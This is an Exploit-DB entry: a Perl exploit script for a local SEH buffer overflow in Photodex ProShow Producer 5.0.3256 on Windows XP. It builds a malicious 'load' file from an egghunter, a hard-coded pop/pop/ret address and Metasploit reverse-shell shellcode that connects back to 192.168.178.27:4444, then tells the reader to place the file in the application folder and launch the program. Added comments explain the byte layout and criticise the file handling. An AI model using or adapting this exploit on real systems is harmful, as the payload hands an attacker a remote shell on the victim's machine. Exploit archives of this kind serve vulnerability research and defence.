Photodex ProShow Producer 5.0.3256 - Local Buffer Overflow

EDB-ID:

20036

CVE:



Author:

mr.pr0n

Type:

local


Platform:

Windows

Date:

2012-07-23


#######################################################################################
# Exploit Title: Photodex ProShow Producer v5.0.3256 - Local Buffer Overflow Exploit
# Date: 22/07/2012
# Author: mr.pr0n (@_pr0n_)
# Homepage: http://ghostinthelab.wordpress.com/
# Software Link: http://files.photodex.com/release/pspro_50_3256.exe
# Version: v5.0.3256
# Tested on: Windows XP SP3
# +-----------------------------------------------------+
# | This vulnerability was discovered and researched    |
# | by Julien Ahrens [from Inshell]                     |
# | http://www.exploit-db.com/exploits/19563/           |
# +-----------------------------------------------------+
######################################################################################

# The egghunter.
# Opaque machine-code bytes; the script itself does not interpret them. The
# only human-readable part is the 4-byte tag "w00t". Below, $exploit places
# that tag twice ("w00tw00t") directly in front of $shellcode, so the
# doubled tag is the marker the hunter is meant to locate (inferred from the
# layout of $exploit, not from these bytes).
$egghunter  =
"\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02".
"\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8".
"w00t". # <-- The 4 byte tag; repeated twice in $exploit as the marker
"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7";

# MSF windows/shell_reverse_tcp 
# LHOST=192.168.178.27 LPORT=4444
# Opaque payload bytes. Per the author's comment this is a Metasploit
# reverse shell with the connect-back host and port hard-coded at generation
# time (a private lab address); the script has no way to change them.
# Only its length is used below, to size $junk.
$shellcode =
"\xb8\x78\x6f\x18\xec\xdb\xcf\xd9\x74\x24\xf4\x5a\x31\xc9\xb1".
"\x4f\x31\x42\x14\x83\xea\xfc\x03\x42\x10\x9a\x9a\xe4\x04\xd3".
"\x65\x15\xd5\x83\xec\xf0\xe4\x91\x8b\x71\x54\x25\xdf\xd4\x55".
"\xce\x8d\xcc\xee\xa2\x19\xe2\x47\x08\x7c\xcd\x58\xbd\x40\x81".
"\x9b\xdc\x3c\xd8\xcf\x3e\x7c\x13\x02\x3f\xb9\x4e\xed\x6d\x12".
"\x04\x5c\x81\x17\x58\x5d\xa0\xf7\xd6\xdd\xda\x72\x28\xa9\x50".
"\x7c\x79\x02\xef\x36\x61\x28\xb7\xe6\x90\xfd\xa4\xdb\xdb\x8a".
"\x1e\xaf\xdd\x5a\x6f\x50\xec\xa2\x23\x6f\xc0\x2e\x3a\xb7\xe7".
"\xd0\x49\xc3\x1b\x6c\x49\x10\x61\xaa\xdc\x85\xc1\x39\x46\x6e".
"\xf3\xee\x10\xe5\xff\x5b\x57\xa1\xe3\x5a\xb4\xd9\x18\xd6\x3b".
"\x0e\xa9\xac\x1f\x8a\xf1\x77\x3e\x8b\x5f\xd9\x3f\xcb\x38\x86".
"\xe5\x87\xab\xd3\x9f\xc5\xa3\x10\xad\xf5\x33\x3f\xa6\x86\x01".
"\xe0\x1c\x01\x2a\x69\xba\xd6\x4d\x40\x7a\x48\xb0\x6b\x7a\x40".
"\x77\x3f\x2a\xfa\x5e\x40\xa1\xfa\x5f\x95\x65\xab\xcf\x46\xc5".
"\x1b\xb0\x36\xad\x71\x3f\x68\xcd\x79\x95\x1f\xca\xee\xd6\x88".
"\x66\xf5\xbe\xca\x86\x1b\x63\x42\x60\x71\x8b\x02\x3b\xee\x32".
"\x0f\xb7\x8f\xbb\x85\x5f\x33\x29\x42\x9f\x3a\x52\xdd\xc8\x6b".
"\xa4\x14\x9c\x81\x9f\x8e\x82\x5b\x79\xe8\x06\x80\xba\xf7\x87".
"\x45\x86\xd3\x97\x93\x07\x58\xc3\x4b\x5e\x36\xbd\x2d\x08\xf8".
"\x17\xe4\xe7\x52\xff\x71\xc4\x64\x79\x7e\x01\x13\x65\xcf\xfc".
"\x62\x9a\xe0\x68\x63\xe3\x1c\x09\x8c\x3e\xa5\x39\xc7\x62\x8c".
"\xd1\x8e\xf7\x8c\xbf\x30\x22\xd2\xb9\xb2\xc6\xab\x3d\xaa\xa3".
"\xae\x7a\x6c\x58\xc3\x13\x19\x5e\x70\x13\x08";


# Output file name, written into the current working directory (no path).
# The script never checks for or removes an existing file of that name.
$file		= "load"; # The "load" file 
# Filler sized so that junk + 8-byte marker + shellcode is exactly 9844
# bytes; the overwrite values ($nseh, $seh) therefore start at offset 9844.
# A long run of 0x41 followed by "w00tw00t" is the most recognisable
# artefact this script leaves on disk.
$junk 		= "\x41" x (9844 - length("w00tw00t") - length($shellcode));
# Variable names and the author's comments mark these as the next-SEH and
# SEH-handler slots of an SEH record overwrite; the script itself only
# concatenates them.
$nseh   	= "\xEB\x06\x90\x90"; # short jump 6 bytes
# Hard-coded address; the author's annotation says it is a pop/pop/ret
# sequence in module "if.dnt". Being a fixed address, the payload is tied
# to that exact module build (tested version per header: v5.0.3256 on XP SP3).
$seh  		= "\x73\xb0\x22\x10"; # 0x1022b073 -p/p/r- [if.dnt]
# Pads the egghunter to a fixed 100 bytes.
$nops  		= "\x90" x (100 - length($egghunter));
# Final layout, in order: filler, marker, payload, nSEH, SEH, 4 NOPs,
# egghunter, NOP padding. Total length is printed after writing.
$exploit 	= $junk."w00tw00t".$shellcode.$nseh.$seh."\x90\x90\x90\x90".$egghunter.$nops;
# NOTE(review): two-argument open on an undeclared global handle, with no
# error check and no strict/warnings in the file. A failed open (e.g. a
# read-only directory) is silently ignored, the print below writes to a
# closed handle, and the success message still appears. The 3-arg form with
# a check reports failure instead:
#   open my $fh, '>:raw', $file or die "open $file: $!";
# (':raw' because the content is binary, not text.)
open($File,">$file");
print $File $exploit;
close($File); # return value unchecked; a flush error at close is lost
# Status messages are printed unconditionally, regardless of whether the
# open/print/close above succeeded.
print " \n[!] The 'load' file, was created successfully (".(length $exploit)." bytes) [!]\n\n";
print "[+] Place the arbitrary 'load' file, into the application directory.\n";
print "[+] Execute the application (proshow.exe) \n";